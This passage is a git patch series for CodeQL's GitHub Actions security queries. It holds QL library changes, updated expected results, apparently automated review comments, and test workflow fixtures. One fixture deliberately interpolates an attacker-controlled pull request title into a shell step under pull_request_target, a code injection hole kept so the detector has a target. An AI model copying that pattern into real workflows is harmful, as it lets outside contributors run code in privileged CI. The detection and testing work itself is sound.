name: push-docker-images + if: ${{ inputs.flow == 'push' }} + needs: + - draft-release-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{inputs.flow}}-${{ inputs.github_workflow }}-push-docker-images-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: false + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all + - name: Publish cmc-api to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-cmc-api.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: cmc-api + artifact: cmc-api:latest + + - name: Publish devnet-xc to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-devnet-xc.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: devnet-xc + artifact: devnet-xc:latest + tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} + + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-rococo-picasso-rococo + artifact: hyperspace-composable-rococo-picasso-rococo:latest + + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: 
result/hyperspace-composable-polkadot-picasso-kusama.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-polkadot-picasso-kusama + artifact: hyperspace-composable-polkadot-picasso-kusama:latest + + mantis-e2e: + name: mantis-e2e + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - build-all-checks-packages + runs-on: + - ubuntu-latest-m + concurrency: + group: ${{ inputs.github_workflow }}-mantis-e2e-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - name: Devnet integration tests + run: | + nix run .#mantis-e2e --accept-flake-config --impure + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 665e9626b24..c91470d5cc8 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -16,5 +16,15 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', 
not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8707849328b..711a529b179 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -109,6 +109,42 @@ edges | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/pr-workflow.yml:57:9:60:6 | Uses Step | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | +| .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | .github/workflows/pr-workflow.yml:78:9:81:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | .github/workflows/pr-workflow.yml:124:9:126:2 | Run Step | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | +| .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | .github/workflows/pr-workflow.yml:158:9:196:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:209:9:216:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:227:9:230:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:243:9:250:6 | Uses Step | 
.github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:261:9:265:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:277:9:284:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:295:9:298:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:309:9:314:6 | Run Step | .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | +| .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | .github/workflows/pr-workflow.yml:318:9:323:2 | Run Step | +| .github/workflows/pr-workflow.yml:337:9:343:6 | Uses Step | .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | +| .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | +| .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | +| .github/workflows/pr-workflow.yml:380:9:386:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | 
.github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | +| .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | 
@@ -170,6 +206,7 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From ef41db3ce51e254d6adc8c2ea58f8313965433a6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:24 +0200 Subject: [PATCH 0500/1267] Extract simple reference expression from ORed disjuncts --- ql/lib/codeql/actions/ast/internal/Ast.qll | 38 +++++++++++++++------- 1 file changed, 27 insertions(+), 11 deletions(-) 
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d9738cb74ad..23b5ead7f0e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -153,17 +153,18 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { YamlNode key; YamlString value; string rawExpression; - string expression; + string fullExpression; int exprOffset; ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") - then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() - else expression = rawExpression.trim() + then + fullExpression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else fullExpression = rawExpression.trim() } - override string toString() { result = expression } + override string toString() { result = fullExpression } override AstNodeImpl getAChildNode() { none() } @@ -173,7 +174,9 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { override YamlNode getNode() { none() } - string getExpression() { result = expression } + string getExpression() { result = fullExpression } + + string getFullExpression() { result = fullExpression } string getRawExpression() { result = rawExpression } 
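Review bot: `getFullExpression()` is added next to `getExpression()` with the same body and no QLDoc, so nothing in `ExpressionImpl` tells a caller which of the two to use. A later hunk in this file overrides `getExpression()` in `SimpleReferenceExpressionImpl`, so the intent appears to be that `getFullExpression()` always returns the whole trimmed body of the `${{ }}` expression. A doc comment such as `/** Gets the complete expression text inside ${{ }}, trimmed; unlike getExpression(), not narrowed by subclasses. */` would make that explicit. The class body continues outside the hunk.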
@@ -1262,12 +1265,15 @@ class RunImpl extends StepImpl { */ bindingset[s] string getASimpleReferenceExpression(string s, int offset) { + // If the expression is ${{ inputs.foo == "foo" }} we should not consider it as a simple reference + // check that expression matches a simple reference or several simple references ORed with || + s.regexpMatch("([A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)(\\s*\\|\\|\\s*[A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)*") and // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) - .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", _) } bindingset[s] @@ -1319,18 +1325,28 @@ string getAJsonReferenceAccessPath(string s, int offset) { } /** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + string expression; + SimpleReferenceExpressionImpl() { - exists(getASimpleReferenceExpression(expression, _)) or - exists(getAJsonReferenceExpression(expression, _)) + ( + expression = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + expression = this.getFullExpression() + ) } + override string getExpression() { result = expression } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); + + override string toString() { result = expression } } class JsonReferenceExpressionImpl extends ExpressionImpl { 
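Review bot: The new whole-string `regexpMatch` guard in `getASimpleReferenceExpression` only admits references joined by `||`, so an expression using the `cond && a || b` idiom, for example `github.event_name == 'pull_request' && github.head_ref || github.ref`, now yields no simple reference at all, where the previous `regexpFind` still returned each token. Unless another class covers such expressions (not visible here), the injection queries built on this predicate could lose findings for them; a fixture pinning that case would show whether the loss is intended. The guard also tests `s` while the extraction below uses `s.trim()`, so `s.trim().regexpMatch(...)` would keep the two consistent. The retained comment about obtaining all matches of `${{...}}` no longer describes what `regexpFind` is applied to.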
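Review bot: The QLDoc on `SimpleReferenceExpressionImpl` now reads "sigcle" where "single" is meant, and it does not say that the new `expression` field holds one disjunct rather than the whole expression. For an input like `a || b` the field takes one value per disjunct, so `getExpression()` and the overridden `toString()` each have several results for the same node, which can duplicate rows in test output. Keeping the string form on the full text, `override string toString() { result = this.getFullExpression() }`, avoids that. The doc line could read `* A ${{}} expression accessing a single context variable such as steps, needs, jobs, env, inputs, or matrix; ORed expressions give one result per disjunct.`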
@@ -1338,8 +1354,8 @@ class JsonReferenceExpressionImpl extends ExpressionImpl { string accessPath; JsonReferenceExpressionImpl() { - innerExpression = getAJsonReferenceExpression(expression, _) and - accessPath = getAJsonReferenceAccessPath(expression, _) + innerExpression = getAJsonReferenceExpression(this.getExpression(), _) and + accessPath = getAJsonReferenceAccessPath(this.getExpression(), _) } string getInnerExpression() { result = innerExpression } From 25a210734b223d1284b06cd2da2a45701cc6a1e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:36 +0200 Subject: [PATCH 0501/1267] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 ------- .../CWE-094/.github/workflows/test12.yml | 13 +++++++ .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + .../CWE-829/.github/workflows/test10.yml | 37 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 9 +++++ .../CWE-829/UntrustedCheckoutHigh.expected | 3 ++ 7 files changed, 65 insertions(+), 14 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml deleted file mode 100644 index bb873ca4eac..00000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: CI - -on: - pull_request_target: - -jobs: - test: - runs-on: ubuntu-latest - steps: - - run: | - echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} - - - diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml new file mode 100644 index 00000000000..f81bef89568 
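Review bot: `JsonReferenceExpressionImpl` now reads its input through `this.getExpression()`, which `SimpleReferenceExpressionImpl` overrides in the previous hunk, while that class passes `this.getFullExpression()` to the same `getAJsonReferenceExpression` helper. For a node that belongs to both classes the two calls can see different strings (a single disjunct versus the full text). Using `innerExpression = getAJsonReferenceExpression(this.getFullExpression(), _) and` and `accessPath = getAJsonReferenceAccessPath(this.getFullExpression(), _)` would keep the JSON handling independent of the override. The class body continues outside the hunk.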
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml
@@ -0,0 +1,13 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "${{ github.event.pull_request.title || "foo" }}"
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 2097a589b5a..4123359b551 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -475,6 +476,7 @@ subpaths | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ce4d74467f9..fa665b85388 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -349,6 +349,7 @@ nodes | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml new file mode 100644 index 00000000000..e8b5466f751 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml 
